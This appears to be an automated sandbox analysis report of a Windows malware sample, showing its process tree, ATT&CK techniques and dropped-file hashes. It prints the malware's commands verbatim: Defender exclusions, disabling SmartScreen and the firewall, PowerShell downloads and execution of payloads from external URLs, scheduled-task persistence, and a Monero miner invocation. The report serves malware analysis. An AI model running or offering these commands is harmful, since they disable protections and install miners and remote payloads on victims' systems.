Processes:

924b06fed5002d7dbc6004401b7a519f.exe4481.exeRegSvcs.execmd.exe3CB2.exeZenar.exepowershell.execmd.exe

description	pid	process	target process
PID 1116 wrote to memory of 1128	1116	924b06fed5002d7dbc6004401b7a519f.exe	924b06fed5002d7dbc6004401b7a519f.exe
PID 1116 wrote to memory of 1128	1116	924b06fed5002d7dbc6004401b7a519f.exe	924b06fed5002d7dbc6004401b7a519f.exe
PID 1116 wrote to memory of 1128	1116	924b06fed5002d7dbc6004401b7a519f.exe	924b06fed5002d7dbc6004401b7a519f.exe
PID 1116 wrote to memory of 1128	1116	924b06fed5002d7dbc6004401b7a519f.exe	924b06fed5002d7dbc6004401b7a519f.exe
PID 1116 wrote to memory of 1128	1116	924b06fed5002d7dbc6004401b7a519f.exe	924b06fed5002d7dbc6004401b7a519f.exe
PID 1116 wrote to memory of 1128	1116	924b06fed5002d7dbc6004401b7a519f.exe	924b06fed5002d7dbc6004401b7a519f.exe
PID 1116 wrote to memory of 1128	1116	924b06fed5002d7dbc6004401b7a519f.exe	924b06fed5002d7dbc6004401b7a519f.exe
PID 1336 wrote to memory of 1660	1336		3552.exe
PID 1336 wrote to memory of 1660	1336		3552.exe
PID 1336 wrote to memory of 1660	1336		3552.exe
PID 1336 wrote to memory of 1660	1336		3552.exe
PID 1336 wrote to memory of 756	1336		3CB2.exe
PID 1336 wrote to memory of 756	1336		3CB2.exe
PID 1336 wrote to memory of 756	1336		3CB2.exe
PID 1336 wrote to memory of 756	1336		3CB2.exe
PID 1336 wrote to memory of 1796	1336		41A3.exe
PID 1336 wrote to memory of 1796	1336		41A3.exe
PID 1336 wrote to memory of 1796	1336		41A3.exe
PID 1336 wrote to memory of 1796	1336		41A3.exe
PID 1336 wrote to memory of 1492	1336		4481.exe
PID 1336 wrote to memory of 1492	1336		4481.exe
PID 1336 wrote to memory of 1492	1336		4481.exe
PID 1336 wrote to memory of 1492	1336		4481.exe
PID 1492 wrote to memory of 1512	1492	4481.exe	RegSvcs.exe
PID 1492 wrote to memory of 1512	1492	4481.exe	RegSvcs.exe
PID 1492 wrote to memory of 1512	1492	4481.exe	RegSvcs.exe
PID 1492 wrote to memory of 1512	1492	4481.exe	RegSvcs.exe
PID 1492 wrote to memory of 1512	1492	4481.exe	RegSvcs.exe
PID 1492 wrote to memory of 1512	1492	4481.exe	RegSvcs.exe
PID 1492 wrote to memory of 1512	1492	4481.exe	RegSvcs.exe
PID 1492 wrote to memory of 1512	1492	4481.exe	RegSvcs.exe
PID 1492 wrote to memory of 1512	1492	4481.exe	RegSvcs.exe
PID 1512 wrote to memory of 1508	1512	RegSvcs.exe	cmd.exe
PID 1512 wrote to memory of 1508	1512	RegSvcs.exe	cmd.exe
PID 1512 wrote to memory of 1508	1512	RegSvcs.exe	cmd.exe
PID 1512 wrote to memory of 1508	1512	RegSvcs.exe	cmd.exe
PID 1508 wrote to memory of 1000	1508	cmd.exe	powershell.exe
PID 1508 wrote to memory of 1000	1508	cmd.exe	powershell.exe
PID 1508 wrote to memory of 1000	1508	cmd.exe	powershell.exe
PID 1508 wrote to memory of 1000	1508	cmd.exe	powershell.exe
PID 756 wrote to memory of 1484	756	3CB2.exe	Zenar.exe
PID 756 wrote to memory of 1484	756	3CB2.exe	Zenar.exe
PID 756 wrote to memory of 1484	756	3CB2.exe	Zenar.exe
PID 756 wrote to memory of 1484	756	3CB2.exe	Zenar.exe
PID 1484 wrote to memory of 1532	1484	Zenar.exe	powershell.exe
PID 1484 wrote to memory of 1532	1484	Zenar.exe	powershell.exe
PID 1484 wrote to memory of 1532	1484	Zenar.exe	powershell.exe
PID 1484 wrote to memory of 572	1484	Zenar.exe	Microsoft_Edge.exe
PID 1484 wrote to memory of 572	1484	Zenar.exe	Microsoft_Edge.exe
PID 1484 wrote to memory of 572	1484	Zenar.exe	Microsoft_Edge.exe
PID 1532 wrote to memory of 1560	1532	powershell.exe	UpSys.exe
PID 1532 wrote to memory of 1560	1532	powershell.exe	UpSys.exe
PID 1532 wrote to memory of 1560	1532	powershell.exe	UpSys.exe
PID 1532 wrote to memory of 1264	1532	powershell.exe	netsh.exe
PID 1532 wrote to memory of 1264	1532	powershell.exe	netsh.exe
PID 1532 wrote to memory of 1264	1532	powershell.exe	netsh.exe
PID 1512 wrote to memory of 1060	1512		cmd.exe
PID 1512 wrote to memory of 1060	1512		cmd.exe
PID 1512 wrote to memory of 1060	1512		cmd.exe
PID 1512 wrote to memory of 1060	1512		cmd.exe
PID 1060 wrote to memory of 1724	1060	cmd.exe	powershell.exe
PID 1060 wrote to memory of 1724	1060	cmd.exe	powershell.exe
PID 1060 wrote to memory of 1724	1060	cmd.exe	powershell.exe
PID 1060 wrote to memory of 1724	1060	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\924b06fed5002d7dbc6004401b7a519f.exe
"C:\Users\Admin\AppData\Local\Temp\924b06fed5002d7dbc6004401b7a519f.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1116

C:\Users\Admin\AppData\Local\Temp\924b06fed5002d7dbc6004401b7a519f.exe
"C:\Users\Admin\AppData\Local\Temp\924b06fed5002d7dbc6004401b7a519f.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1128

C:\Users\Admin\AppData\Local\Temp\3552.exe
C:\Users\Admin\AppData\Local\Temp\3552.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Users\Admin\AppData\Local\Temp\3CB2.exe
C:\Users\Admin\AppData\Local\Temp\3CB2.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:756

C:\Users\Admin\AppData\Local\Temp\Zenar.exe
"C:\Users\Admin\AppData\Local\Temp\Zenar.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(exit)
3⤵
- Modifies security service
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532

C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1560

C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:560

C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
6⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
7⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
4⤵
PID:1264

C:\ProgramData\Systemd\Microsoft_Edge.exe
-o pool.minexmr.com:4444 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQnLV2S6XfF4NcZDZ76 -p password666 --coin=XMR --cpu-max-threads-hint=35
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:572

C:\Users\Admin\AppData\Local\Temp\41A3.exe
C:\Users\Admin\AppData\Local\Temp\41A3.exe
1⤵
- Executes dropped EXE
PID:1796

C:\Users\Admin\AppData\Local\Temp\4481.exe
C:\Users\Admin\AppData\Local\Temp\4481.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('The operating system is not supported by this application','Error','OK','Error')"
3⤵
- Suspicious use of WriteProcessMemory
PID:1508

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('The operating system is not supported by this application','Error','OK','Error')"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1000

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/61502be7944fdh?raw', (Join-Path -Path $env:Temp -ChildPath 'Java.exe'))" & powershell "(New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/614cdbc0954d0h?raw', (Join-Path -Path $env:UserProfile -ChildPath 'RuntimeBroker.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'Java.exe')" & powershell "Start-Process -FilePath (Join-Path -Path $env:UserProfile -ChildPath 'RuntimeBroker.exe')" & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/61502be7944fdh?raw', (Join-Path -Path $env:Temp -ChildPath 'Java.exe'))"
4⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "(New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/614cdbc0954d0h?raw', (Join-Path -Path $env:UserProfile -ChildPath 'RuntimeBroker.exe'))"
4⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:668

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'Java.exe')"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1144

C:\Users\Admin\AppData\Local\Temp\Java.exe
"C:\Users\Admin\AppData\Local\Temp\Java.exe"
5⤵
- Executes dropped EXE
PID:608

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
6⤵
- Loads dropped DLL
PID:1144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\Java.exe"
6⤵
- Loads dropped DLL
PID:1512

C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\Java.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
8⤵
PID:2044

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
9⤵
- Creates scheduled task(s)
PID:1784

C:\Windows\system32\services32.exe
"C:\Windows\system32\services32.exe"
8⤵
- Executes dropped EXE
PID:1116

C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
9⤵
PID:1096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
10⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
10⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
10⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1260

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
10⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
9⤵
- Loads dropped DLL
PID:1668

C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
10⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1648

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
11⤵
PID:1984

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
12⤵
- Creates scheduled task(s)
PID:1920

C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
11⤵
- Executes dropped EXE
PID:884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
11⤵
PID:1896

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
12⤵
PID:1956

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
8⤵
PID:1924

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
9⤵
PID:1756

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "Start-Process -FilePath (Join-Path -Path $env:UserProfile -ChildPath 'RuntimeBroker.exe')"
4⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1584

C:\Users\Admin\RuntimeBroker.exe
"C:\Users\Admin\RuntimeBroker.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1436

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
6⤵
PID:1124

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %TEMP%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
7⤵
PID:1468

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Local\Temp\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
8⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1260

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20210926090207.log C:\Windows\Logs\CBS\CbsPersist_20210926090207.cab
1⤵
PID:1260

C:\Windows\system32\taskeng.exe
taskeng.exe {6870C981-12EF-4E58-BD45-69CB9AF6C89B} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:1560

C:\Users\Admin\AppData\Local\Temp\service.exe
C:\Users\Admin\AppData\Local\Temp\service.exe
2⤵
- Executes dropped EXE
PID:1924

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Systemd\Microsoft_Edge.exe
MD5
dd65d21cce0fb19114b0a0aadedf8e00

SHA1
2f147e1d503561b4fdaa2e0adc2191ab73184b3c

SHA256
34db189b47a0568cefceaf3e00968482896969132d2f77ebe42e4a9e91db2cdc

SHA512
df98ebb4c0ca4bae827ade7026d39e29b144e0de91e83c77476739bd43d3e2709f34cf618efe6ea22a89d3ae59e7b29f5202df15a3eddb0d5ffee18b6e217444

Download Submit
C:\ProgramData\UpSys.exe
MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\ProgramData\UpSys.exe
MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\ProgramData\UpSys.exe
MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\ProgramData\UpSys.exe
MD5
efe5769e37ba37cf4607cb9918639932

SHA1
f24ca204af2237a714e8b41d54043da7bbe5393b

SHA256
5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2

SHA512
33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\3552.exe
MD5
a8f923639f9b10392a12e409a4b65d80

SHA1
5dc1b8d6751f37ac2cfa526e35de2bedac479332

SHA256
ec9c47685aaf2711429538df1efddeace58992d79f685387778f0a99af4cdbe5

SHA512
57a34ad6388e675c69dcce9a5a8761d9d7ec80be3229545b82dfd8bf16f0702ccdf6a51b8316d569f10f8a6e2e9b9e78ee07227b73d356984a10061b63921214

Download Submit
C:\Users\Admin\AppData\Local\Temp\3CB2.exe
MD5
72ebda1e2c91ad8b5b1bfb289ffa77e0

SHA1
5410014afec276692910ded77d532775de92e699

SHA256
598abf20dbea3d5ea767057ca90aba6ddfd051d1074684b9099b47037af5bb1b

SHA512
75c97d3c35c90627dfd52dfdfe2539bdfe297cc0ca04a117aa5df294af8857e4fddf0cae527d2a4bdf12cd4a6666dc3e64f268f1e68f8276dd39950f77357c63

Download Submit
C:\Users\Admin\AppData\Local\Temp\41A3.exe
MD5
d97c34cf8df6b94a767a4de88f38af86

SHA1
90af7b45728e4be0f403f097e1687fcc3c1053b9

SHA256
a79d76b9e2dc0e30bf14ba869fa8627080f88d3bdfd96c7e6631b707169ea359

SHA512
ef1558c23ec769c3212d48da8afc8121f484b26809e21864512d7f9e5cbf2502254d426d6155a9c6534351f66f73c95b64ff8154cc39512bc5d538fed7b636c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\4481.exe
MD5
9691eb93fe5a81e5205b95f48025ccbe

SHA1
354257c9c70a8ca02c293c60ad44ee996908e313

SHA256
1b7dcf75439abec09606bbff05bfafc1d3b58e885b8cce82569f7e8ba8119402

SHA512
08f36d70665f3d7182e1f629b38b0c0381561cb011a3da10475bcdf39064f8a9faec6658ace47c499508e16ba07a665445ff2c83b53c53342ca4fea87cd577a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\4481.exe
MD5
9691eb93fe5a81e5205b95f48025ccbe

SHA1
354257c9c70a8ca02c293c60ad44ee996908e313

SHA256
1b7dcf75439abec09606bbff05bfafc1d3b58e885b8cce82569f7e8ba8119402

SHA512
08f36d70665f3d7182e1f629b38b0c0381561cb011a3da10475bcdf39064f8a9faec6658ace47c499508e16ba07a665445ff2c83b53c53342ca4fea87cd577a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Java.exe
MD5
abda2f5156c097128793e5eeed6d4fec

SHA1
449fabee267fee6e7385e7f653a9fe9d917c25b5

SHA256
caea55697a188d55a6cc9940d7854e8d01aeda082d37ca3f1f8a907c10d41bca

SHA512
abd5500a52e351ad927db72157dfbcf618aa289c2e0d39278512a7a3dc55d3434f5916a6f9b46ac65e1d685a32c087ea0b6379afa91508fb33b9d79c60fcdcb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Java.exe
MD5
abda2f5156c097128793e5eeed6d4fec

SHA1
449fabee267fee6e7385e7f653a9fe9d917c25b5

SHA256
caea55697a188d55a6cc9940d7854e8d01aeda082d37ca3f1f8a907c10d41bca

SHA512
abd5500a52e351ad927db72157dfbcf618aa289c2e0d39278512a7a3dc55d3434f5916a6f9b46ac65e1d685a32c087ea0b6379afa91508fb33b9d79c60fcdcb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Zenar.exe
MD5
844b7e033c078ed67b52558b5d891741

SHA1
cff2a6b3b726455b9ed898aa766f2363189642bc

SHA256
eff8a484eafd5ebdf57845e6a656793520bdddf5469ea4a95eaa578e8bca6c50

SHA512
537487e3d6b6be107530e36547f3b66d61cce29d127ac1ce9ad34d2eb1e60ddb4d368a6c8e1366ef307982ffba507aff87ca2a9590e9fb58ad74b7c628a6dfca

Download Submit
C:\Users\Admin\AppData\Local\Temp\Zenar.exe
MD5
844b7e033c078ed67b52558b5d891741

SHA1
cff2a6b3b726455b9ed898aa766f2363189642bc

SHA256
eff8a484eafd5ebdf57845e6a656793520bdddf5469ea4a95eaa578e8bca6c50

SHA512
537487e3d6b6be107530e36547f3b66d61cce29d127ac1ce9ad34d2eb1e60ddb4d368a6c8e1366ef307982ffba507aff87ca2a9590e9fb58ad74b7c628a6dfca

Download Submit
C:\Users\Admin\AppData\Local\Temp\service.exe
MD5
0e06054beb13192588e745ee63a84173

SHA1
30b7d4d1277bafd04a83779fd566a1f834a8d113

SHA256
c5d6d56ded55fbd6c150ee3a0eb2e5671cae83106be2be4d70ce50aa50bab768

SHA512
251a112f3f037e62ff67a467389e47a56afb344bc942b17efa9bd2970494718b26bbee9adc3ac35f93ee4d2114aa426b6d0ea4bafad294b6c118a15f1977c215

Download Submit
C:\Users\Admin\AppData\Local\Temp\service.exe
MD5
0e06054beb13192588e745ee63a84173

SHA1
30b7d4d1277bafd04a83779fd566a1f834a8d113

SHA256
c5d6d56ded55fbd6c150ee3a0eb2e5671cae83106be2be4d70ce50aa50bab768

SHA512
251a112f3f037e62ff67a467389e47a56afb344bc942b17efa9bd2970494718b26bbee9adc3ac35f93ee4d2114aa426b6d0ea4bafad294b6c118a15f1977c215

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
MD5
b20285ac442172efbfe87ddc5ffc4bda

SHA1
c64477adc2a3625d0450e88bc6a776454812b69b

SHA256
a7e8ac53601c936ad2271862b2e816988780ed484269538bbbe561cc0fcd96fe

SHA512
5989ed8b72dfeef1c863dace92cba86864f12dc5819448753d24fee088e2db61d545fccca830cc0ba4b5a4b87da5a8304606db0c4618925fd5ae3849b2e505f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
MD5
b20285ac442172efbfe87ddc5ffc4bda

SHA1
c64477adc2a3625d0450e88bc6a776454812b69b

SHA256
a7e8ac53601c936ad2271862b2e816988780ed484269538bbbe561cc0fcd96fe

SHA512
5989ed8b72dfeef1c863dace92cba86864f12dc5819448753d24fee088e2db61d545fccca830cc0ba4b5a4b87da5a8304606db0c4618925fd5ae3849b2e505f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
MD5
b20285ac442172efbfe87ddc5ffc4bda

SHA1
c64477adc2a3625d0450e88bc6a776454812b69b

SHA256
a7e8ac53601c936ad2271862b2e816988780ed484269538bbbe561cc0fcd96fe

SHA512
5989ed8b72dfeef1c863dace92cba86864f12dc5819448753d24fee088e2db61d545fccca830cc0ba4b5a4b87da5a8304606db0c4618925fd5ae3849b2e505f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
MD5
b20285ac442172efbfe87ddc5ffc4bda

SHA1
c64477adc2a3625d0450e88bc6a776454812b69b

SHA256
a7e8ac53601c936ad2271862b2e816988780ed484269538bbbe561cc0fcd96fe

SHA512
5989ed8b72dfeef1c863dace92cba86864f12dc5819448753d24fee088e2db61d545fccca830cc0ba4b5a4b87da5a8304606db0c4618925fd5ae3849b2e505f6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
ee79d5c5370a0f2e2284a1e153f80555

SHA1
3f85def43c014060e18266adf9dc5f3ae492c54d

SHA256
16a0bcf5457bbed99b964aac476836fe965bb159c4936610ad2c3a37b8f99d40

SHA512
3341a94817a4d6a68545ac379e530bd1d6f19785012076bae97194779cfefc15773fbd0cd3180eb842ca4a0166984cf25a393747605d150b359e9691021c3521

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
ee79d5c5370a0f2e2284a1e153f80555

SHA1
3f85def43c014060e18266adf9dc5f3ae492c54d

SHA256
16a0bcf5457bbed99b964aac476836fe965bb159c4936610ad2c3a37b8f99d40

SHA512
3341a94817a4d6a68545ac379e530bd1d6f19785012076bae97194779cfefc15773fbd0cd3180eb842ca4a0166984cf25a393747605d150b359e9691021c3521

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
94e78991d91ee7a02e7f36b35c82f7e3

SHA1
fab021b2d92a203dcc1fe63351b43cacaf46d146

SHA256
e3c063c075a21435eb84bb2cf76f9180bbe62534a512cab21761128a443cfb8f

SHA512
